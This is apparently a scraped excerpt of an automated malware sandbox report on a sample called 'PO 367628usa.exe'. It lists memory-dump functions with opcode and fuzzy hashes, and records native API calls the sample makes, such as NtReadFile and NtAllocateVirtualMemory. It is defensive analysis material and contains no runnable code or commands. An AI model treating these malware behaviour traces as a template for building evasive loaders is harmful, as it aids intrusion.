API ID:
String ID:
API String ID:
Opcode ID: e1072b5b0946ad3b979cfdc7fa47902eee60a72868d14a584cbf6b9805dcf03d
Instruction ID: e3040f2776b6878e2033c2e57c34289bc82dc4510ea4da082d5d5186156d3180
Opcode Fuzzy Hash: e1072b5b0946ad3b979cfdc7fa47902eee60a72868d14a584cbf6b9805dcf03d
Instruction Fuzzy Hash: C471F575E15609DFCB08CFA9C6809DEFBF2FF89211F24946AD409BB314D7309A428B65

Uniqueness

Uniqueness Score: -1.00%

Function 00DD60E0, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d331b2a8676143bfd2bb5ddec11bd6697498f45e970d866ba1d126224e37591
Instruction ID: 1c836ee9d2676c0ab4436dee96c02949b866e8b465d7eda83d5320bd0ebf1a53
Opcode Fuzzy Hash: 3d331b2a8676143bfd2bb5ddec11bd6697498f45e970d866ba1d126224e37591
Instruction Fuzzy Hash: 1C71D1B4E0420ADFCB04CF99D5819AEFBB2FF89310F24951AD455AB315D334E9828FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD60D0, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f999e4f48d23a5611dabada3985eabbfe0b764719a24576f3e873c5eb511889
Instruction ID: d168e21b7490ad6934dafacdc0e269b1cf4edd70a15cb3b90cc3c980acebad03
Opcode Fuzzy Hash: 0f999e4f48d23a5611dabada3985eabbfe0b764719a24576f3e873c5eb511889
Instruction Fuzzy Hash: 0C61D074E0420ADFCB04CFA9C5919AEFBB2FF89310F28955AD455A7315D330E9828FA5

Uniqueness

Uniqueness Score: -1.00%

Function 054ED5D9, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b59ca3c8e5af4d8c79c826adc0c5ad0d291c5c1d34a4dff253c2a4337289360
Instruction ID: 94548758bc3c1d9a8181a899f808096b6b7495b540282d102b6a1852e46519f3
Opcode Fuzzy Hash: 9b59ca3c8e5af4d8c79c826adc0c5ad0d291c5c1d34a4dff253c2a4337289360
Instruction Fuzzy Hash: 98610975E15209CFCB08CFA9C6819DEFBF2FF8D211F24946AD409BB214D7349A428B65

Uniqueness

Uniqueness Score: -1.00%

Function 05C645A8, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84eced4f5b0a10b83f9cd52452256cf1a553dcc5bac3ca5211614d705265f4a6
Instruction ID: dd7d55a4e1dd12e45927c0c996d72ee1e108f4863ad3315945f615ca6ba2b745
Opcode Fuzzy Hash: 84eced4f5b0a10b83f9cd52452256cf1a553dcc5bac3ca5211614d705265f4a6
Instruction Fuzzy Hash: 2E511574E012199FCF08CFEAD5C1AEEFBB2AB89310F14D826E514A7254D7749A418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD69A8, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c01daec33c5f1e07f122bd96235aefc892867a122d089f1f019fccd54c4efb1
Instruction ID: c90a6c8969f7c58b73d1ae2323235049cf180a8b34b8c819bc2123b07272d52c
Opcode Fuzzy Hash: 1c01daec33c5f1e07f122bd96235aefc892867a122d089f1f019fccd54c4efb1
Instruction Fuzzy Hash: 7161E370E052198FCB04CFAAD9849DEFBF2FB88310F24946AD445B7314D7349A418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C6459B, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2516515271eeb3cad839114e49f55b5c6aa488098c50771f38f530d091fb42a7
Instruction ID: 3ecebed93ef4d6dea974ec10bf883313d24ead430b8233b2eb920411d554b3f4
Opcode Fuzzy Hash: 2516515271eeb3cad839114e49f55b5c6aa488098c50771f38f530d091fb42a7
Instruction Fuzzy Hash: 09512574E012199FCF08CFEAD5C5AEEFBF2AB89310F14C826E514A7254D7349A418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6999, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93fcfc4c93b0c1844c13206cae1631e0d05fb3a3a85d4c9692eb50c824882cb
Instruction ID: 3d7603a6d67b55115509594142f9620c10e0f663fb965d72e0e1fdb3f5475ebb
Opcode Fuzzy Hash: c93fcfc4c93b0c1844c13206cae1631e0d05fb3a3a85d4c9692eb50c824882cb
Instruction Fuzzy Hash: 4761E274E0521A8FCB04CFA9C9849EEFBF2FB89310F28946AD445B7314D7349A058FA4

Uniqueness

Uniqueness Score: -1.00%

Function 054ECD58, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c8603fb25c16bd509c881e585f7ef1bd892b77b5f4b64e51c469a4910fd269
Instruction ID: 074c43ea38f94ae1f8d57711360b4114cb55b85830776e53a9b6365a4bd90206
Opcode Fuzzy Hash: 49c8603fb25c16bd509c881e585f7ef1bd892b77b5f4b64e51c469a4910fd269
Instruction Fuzzy Hash: 6D71F0B4E1420ADFCB44CFA9C5819EEFBB2BF89311F15851AD515AB304D730AA82CF95

Uniqueness

Uniqueness Score: -1.00%

Function 054ECD48, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81a1924b5542bb09a9ff19745bf01adc29d6828a5130091c77700aef43cf6f94
Instruction ID: de1486a8ea32e269ecffcf94f3f02a495708fb64cfd046824f7417fc3be3f33b
Opcode Fuzzy Hash: 81a1924b5542bb09a9ff19745bf01adc29d6828a5130091c77700aef43cf6f94
Instruction Fuzzy Hash: 2B61F1B4E1420ADFCB04CFA9C5819EEFFB2BF89211F158556D415AB344D730A982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00DD1908, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4034672f10ebf7b98cf6e8fc7b23261994a5e7b3a036da4e4ade95854b756fe6
Instruction ID: 55d3ce297b4a93a0440fa8ee93ae044bf22febfe8f13f95a41a1cbcb08649d70
Opcode Fuzzy Hash: 4034672f10ebf7b98cf6e8fc7b23261994a5e7b3a036da4e4ade95854b756fe6
Instruction Fuzzy Hash: 475105B4E016189FDB18CFAAC944A9EFBF3FF89310F08C5A6D508AB215D73099458F65

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6748, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0997163012a833210ea07fd460b4b6b48177e63cea767cba793844094b28198f
Instruction ID: 97bc31b3f78194ffc1c2a050f2a9e90623c6370dcfcc381088d32c0b9032bf77
Opcode Fuzzy Hash: 0997163012a833210ea07fd460b4b6b48177e63cea767cba793844094b28198f
Instruction Fuzzy Hash: 445108B4E0524A9FCB44CFAAC8415AEFBF2FB89304F24D46AD415E7354D73896418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 054ED860, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7e1aded6a236a78169f3121f31e248cb69658cab460117380c379e483b405e
Instruction ID: 7d423f71a2e2cabcd90c72e8664c50a7a5d8c4f14ec93289e53bb0c94c453ce5
Opcode Fuzzy Hash: fa7e1aded6a236a78169f3121f31e248cb69658cab460117380c379e483b405e
Instruction Fuzzy Hash: 715105B4E1520ADFCB48CFAAC5815EEFBF2FF88300F24956AC415B7214D7349A428B94

Uniqueness

Uniqueness Score: -1.00%

Function 05C60007, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2585f5a631ff7d777bdc422cbcc20dc2000515a88fac4f9f31732c083348fe88
Instruction ID: 4712e529977c28223d0eff776f198ce05afdb9ae78391aac1457554879ef87bd
Opcode Fuzzy Hash: 2585f5a631ff7d777bdc422cbcc20dc2000515a88fac4f9f31732c083348fe88
Instruction Fuzzy Hash: 0751AD71D057588FEB19CF6B8D44789BBF3AFC9200F18C1BA944CAA265EB340A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6758, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b6a75920960252c79c47f8b7201afc23140991eaeb5e9c3b4db58f3052345a
Instruction ID: f75ef909d88a16f349ffe7a485b4c513283025639d21e990f81ecfda450fcc2b
Opcode Fuzzy Hash: 15b6a75920960252c79c47f8b7201afc23140991eaeb5e9c3b4db58f3052345a
Instruction Fuzzy Hash: 7E51F8B4E0420ADFCB58CFAAC4815AEFBF2FB88304F24D46AD515A7354D7349A419FA4

Uniqueness

Uniqueness Score: -1.00%

Function 054ED851, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b3a8d370d53638209567f8949a8f708a24afc07e68bc0e89a792339225046b
Instruction ID: b77a0eda192cf11befee26c79572a8022825ccdf7f26e545eae7fb0e0647fbba
Opcode Fuzzy Hash: d8b3a8d370d53638209567f8949a8f708a24afc07e68bc0e89a792339225046b
Instruction Fuzzy Hash: 165135B4E1520ADFCB48CFAAC5815EEFBB2FF88300F24856AD415B7254D7349A428B94

Uniqueness

Uniqueness Score: -1.00%

Function 05C60040, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0247c75a759834743ecd3c47e57771bcdc15ef17d04fc1dd85d635d1105729d
Instruction ID: 2cf84f3a23e68b30f8a77b39341be4143eed525e749efe828d6fc9c7f618dcb5
Opcode Fuzzy Hash: f0247c75a759834743ecd3c47e57771bcdc15ef17d04fc1dd85d635d1105729d
Instruction Fuzzy Hash: AD414B75E156588BEB18CF6B8D4569EFBF7BFC8300F14C1BA950CA6254EB300A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6BF8, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa24365bfa67f310d94f2a634b3e1264dd01627e62f34918ea381d561f765e0
Instruction ID: a1c019df850173ad53aaa6af9024b919c9f39a97b5aa0c388e972450a5e54f6b
Opcode Fuzzy Hash: 6aa24365bfa67f310d94f2a634b3e1264dd01627e62f34918ea381d561f765e0
Instruction Fuzzy Hash: DF41E9B0E1560ADFCB08CFA9C5415AEFBF2EF88300F24C566C954A7354D7309A81CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6C08, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0258501b6dfecfbe738bae2d02650c4170f41c1a2ebb3630d794fc2fa84b6814
Instruction ID: 3b1877cedb0778ea706001b65a5ab58931979476a20d6a976c24a39fa361eb63
Opcode Fuzzy Hash: 0258501b6dfecfbe738bae2d02650c4170f41c1a2ebb3630d794fc2fa84b6814
Instruction Fuzzy Hash: 2641E9B0E1560ADBCB08CFA9C5405AEFBF2FF88300F24D56AC555B7354E7309A818BA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C630F0, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9239c594e3d414bbedfcda35ef5abd497d2be97673ace05f08682bd7cb50f5
Instruction ID: 3006b25c1924dba8ff1382f8b146ee4f40f6147269a4b316d14296393bb8c732
Opcode Fuzzy Hash: 1f9239c594e3d414bbedfcda35ef5abd497d2be97673ace05f08682bd7cb50f5
Instruction Fuzzy Hash: 523125B6E146898FCB18CFBAD88569EBFF2ABC5210F04C57AD048E7295DB304702CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00DD6DC1, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0148d41e7afde2f2b5741bec68a46f54b466490bffa773f1696303af4a0bfeb7
Instruction ID: 920fbb5179d1211f92ffc02be6e6352262a1f4b49bd1db3555c24c5a2556b8d6
Opcode Fuzzy Hash: 0148d41e7afde2f2b5741bec68a46f54b466490bffa773f1696303af4a0bfeb7
Instruction Fuzzy Hash: B7310A75E056189FDB18CFABD94069EFBB3AFC9300F14C0AAD419AA255EB3049468F61

Uniqueness

Uniqueness Score: -1.00%

Function 05C66B90, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 711a89828d953ab0fd3c8eeaca61158de1dbc5b3a5a0682f54d32e31b2741f22
Instruction ID: be06d7c7d5c9514844ae88bdb3dfb503aaa176377a966a45b054720cc234ba78
Opcode Fuzzy Hash: 711a89828d953ab0fd3c8eeaca61158de1dbc5b3a5a0682f54d32e31b2741f22
Instruction Fuzzy Hash: 57312F70E116199BDB18CFAAD9806EEFBF2FFC8200F14D96AD509A7254DB305A418F50

Uniqueness

Uniqueness Score: -1.00%

Function 05C66B80, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f6b6f92c3487b7f6994921a012e2543bb3d012fec7f6276ce11f1b6b0d7a67
Instruction ID: 6a2b8ec2f0560d396b8ca6db7da8cb6a316449b39fb6570410b5c4a824e76ed3
Opcode Fuzzy Hash: 58f6b6f92c3487b7f6994921a012e2543bb3d012fec7f6276ce11f1b6b0d7a67
Instruction Fuzzy Hash: C4314070E116199BDB18CFAAD9817AEFBF3BFC9300F14C96AD909A7254DB305A418F50

Uniqueness

Uniqueness Score: -1.00%

Function 05C64E78, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e37fcd8499353acb5f2ad35bccbaab6701d0c771d920f73a5b3b0c347d8a67b
Instruction ID: 00ec0bfa2bdea79cc021601fe8c2409df47515558cc0597a7f57d5644a3798eb
Opcode Fuzzy Hash: 3e37fcd8499353acb5f2ad35bccbaab6701d0c771d920f73a5b3b0c347d8a67b
Instruction Fuzzy Hash: CE316270D29B858EDB0DCF6FD881B9ABFF2ABC9300F04C0AAD048A7255DB744645CB55

Uniqueness

Uniqueness Score: -1.00%

Function 05C637B0, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d135bc0422063dae1a7bfc0fa248e332e5f5d749b90e59f439fbd285c81852
Instruction ID: a350ee7fea40f95670c07ce6def12f1b8ad04ee1a7af1b1cb5e0653e23fb04e7
Opcode Fuzzy Hash: 44d135bc0422063dae1a7bfc0fa248e332e5f5d749b90e59f439fbd285c81852
Instruction Fuzzy Hash: CD31B1B1E256888FD718CF7ADD4278ABFF3AFCA710F08C86AD404A3255DB3446418B52

Uniqueness

Uniqueness Score: -1.00%

Function 054EDA68, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a98d68b7c9c46af3ffbee8f32e2c29be5461b96a859422383f0c9b75bc319d
Instruction ID: 72ff0c260df65b19213237c202936e9fb25d834da3d708a9193f726058e8258e
Opcode Fuzzy Hash: 83a98d68b7c9c46af3ffbee8f32e2c29be5461b96a859422383f0c9b75bc319d
Instruction Fuzzy Hash: 08211571E056189BEB18CFABD8406DEFBF7AFC8301F08C0BAC818A6254EB3405568F51

Uniqueness

Uniqueness Score: -1.00%

Function 00DDB1F8, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063fa038d6b23064a5c2638fd3af37921b09e3f9bfccaaee2d45662717489c77
Instruction ID: 0a3fe119f6a5f847855be638a0ee41ce6635091ab24dc9b6d5633879c26e0646
Opcode Fuzzy Hash: 063fa038d6b23064a5c2638fd3af37921b09e3f9bfccaaee2d45662717489c77
Instruction Fuzzy Hash: 11211871E116199BDB18CFAAD9406EEFBF7BFC9310F14C23AD408A7254DB345A018B51

Uniqueness

Uniqueness Score: -1.00%

Function 05C64ED8, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec3416d6d786535cd75268360ab1aa6aa240c2ed244734b51f234c6cd82aed6
Instruction ID: fe8dfe679b8f7c0bba9e9fb5962fc64f6a3aed535ceed2f12ea5a9a066e151d0
Opcode Fuzzy Hash: 5ec3416d6d786535cd75268360ab1aa6aa240c2ed244734b51f234c6cd82aed6
Instruction Fuzzy Hash: 4521D871E116199BDB08CFABD9816EEFBF7EBC8210F14C47AD508A7214EB305A418B51

Uniqueness

Uniqueness Score: -1.00%

Function 05C63168, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ed8983b5e1ca2a86404b5caf46f28cf4cded7adb9cf73dff6c4c0ca829f9f5
Instruction ID: 8dd6a4d105a78f7a5ec2a4be5130ce1cc983a61af8c98b87315fafbe43fc9f17
Opcode Fuzzy Hash: 32ed8983b5e1ca2a86404b5caf46f28cf4cded7adb9cf73dff6c4c0ca829f9f5
Instruction Fuzzy Hash: 501128B0E116189BDB58CFABD94169EFAF7AFC8300F14C43AD808A7258DB305A428F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO 367628usa.exe PID: 6724 Parent PID: 6596 PO 367628usa.exeCOMMON

Executed Functions

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
Instruction ID: ebc89adc19509f38eaacf94272f55c7feec8d1b69a62f348563172bb044c10d1
Opcode Fuzzy Hash: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
Instruction Fuzzy Hash: F3F01DB6114149ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C634EC558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181BC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
Instruction ID: d762fb2db014eb627c0b73c0f32ef6c6772fa739a57ca419a0c343087aab13c9
Opcode Fuzzy Hash: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
Instruction Fuzzy Hash: 92F0C4B2200108AFCB08CF88DC94EEB37A9AF8C354F15864CFA0D97240C630E855CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182EC, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b4af973ab9df2f1f83a86398b7bf47c8b29d517c95ba7550161fd9d1121d55c9
Instruction ID: e7010d775404e26488b1f9ba7be8b831d0a2b441666e9574549967ff22f0878f
Opcode Fuzzy Hash: b4af973ab9df2f1f83a86398b7bf47c8b29d517c95ba7550161fd9d1121d55c9
Instruction Fuzzy Hash: 80D02BAD00D2C04FDB10FBB474C10C67B40DEA121831459CFD4A807643C524920593D1

Uniqueness

Uniqueness Score: -1.00%

Function 0041839B, Relevance: 1.5, APIs: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
Instruction ID: 6e5cee6a04b86537ac699d5078897a4e9a9742e5c477a43f627ec682158b8773
Opcode Fuzzy Hash: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
Instruction Fuzzy Hash: FDD0A7B21491486BC718CFD5ACC0CB377ECDFD8620708858FFD594600AC431A4148F70

Uniqueness

Uniqueness Score: -1.00%

